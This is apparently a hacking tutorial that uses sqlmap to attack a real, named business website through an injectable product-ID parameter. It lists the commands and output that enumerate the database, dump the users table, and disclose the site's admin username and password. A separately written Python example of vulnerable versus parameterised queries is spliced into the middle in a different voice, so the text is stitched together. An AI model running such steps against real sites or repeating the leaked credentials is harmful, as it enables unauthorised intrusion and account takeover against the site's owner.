SQLMAP-->
sqlmap is an open source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking over
database servers. It comes with a powerful detection engine, many
niche features for the ultimate penetration tester, and a broad range of
switches ranging from database fingerprinting, through fetching data from
the database, to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.
First, look for the vulnerability in the target website.
target-->
www.tsbuttons.com.bd
Now find the SQL injection vulnerability in the target website.
ohh I found it....
vulnerability-->
tsbuttons.com.bd/jean_tack_buttons.php?ptid=20'
This is the error shown on the website:
---------------------------------------------
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''' at
line 1
---------------------------------------------
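Why a lone quote in ptid produces the error above, and how the handler should treat the parameter instead. This is an added example, not code from the original page or from the site: it assumes the page builds its query by string concatenation, uses SQLite as a stand-in for MySQL, and the table, column and function names are hypothetical.

```python
import sqlite3


def make_db():
    """Constructed stand-in database (SQLite here; the page's site runs MySQL)."""
    db = sqlite3.connect(":memory:")
    # Hypothetical schema: the page never shows which table or column ptid maps to.
    db.execute("CREATE TABLE product (ptid INTEGER, name TEXT)")
    db.execute("INSERT INTO product VALUES (20, 'jean tack button')")
    return db


def lookup_vulnerable(db, ptid):
    """Assumed shape of the flaw: the raw parameter becomes part of the SQL text."""
    sql = "SELECT name FROM product WHERE ptid = " + ptid
    return db.execute(sql).fetchall()  # a stray quote breaks the statement


def lookup_hardened(db, ptid):
    """Return (http_status, rows); the client never sees a database error."""
    # 1. Validate: ptid must be a short run of ASCII digits, nothing else.
    if not (ptid.isascii() and ptid.isdigit() and len(ptid) <= 9):
        return 400, []
    try:
        # 2. Bind: the placeholder keeps the value out of the SQL text.
        rows = db.execute(
            "SELECT name FROM product WHERE ptid = ?", (int(ptid),)
        ).fetchall()
    except sqlite3.Error:
        # 3. Log server-side in a real handler; return a generic status only.
        return 500, []
    return (200, rows) if rows else (404, [])


if __name__ == "__main__":
    db = make_db()
    try:
        lookup_vulnerable(db, "20'")  # the request shown on this page
    except sqlite3.OperationalError as exc:
        print("vulnerable handler leaks:", exc)
    print("hardened, ptid=20' ->", lookup_hardened(db, "20'"))
    print("hardened, ptid=20  ->", lookup_hardened(db, "20"))
```

With validation, binding and generic error responses in place, the quote test no longer returns a database error that reveals an injectable parameter.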
Now start the game (hack the target site).
1. Open sqlmap
root@kali:~# sqlmap --help
2. Find out the database name of the target website
root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 --dbs
output is
----------------------------------------
available databases [2]:
[*] information_schema
[*] tsbutton_db
---------------------------------------
3. Access the tables of the database
root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db --tables
output is
--------------------------------------------------------------------------------------------------------
[23:29:38] [INFO] fetching tables for database: 'tsbutton_db'
Database: tsbutton_db
[4 tables]
+--------------+
| news         |
| product      |
| product_type |
| users        |
+--------------+
---------------------------------------------------------------------------------------------------------
4. Now it is time to access the columns of the tables we fetched from the database
root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users --columns
output is
--------------------------------------------------------
Database: tsbutton_db
Table: users
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| name     | varchar(25)  |
| Password | varchar(255) |
| type     | int(4)       |
| userid   | int(25)      |
| username | varchar(25)  |
+----------+--------------+
-------------------------------------------------------
5. Access the user name
root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users -C username --dump
Yeah, we get the user name of the target website.
username-->admin
6. Let's access the password
root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users -C password --dump
Finally, the game is over.
--------------------------------------------------------------
username-->admin
password-->water
-------------------------------------------------------------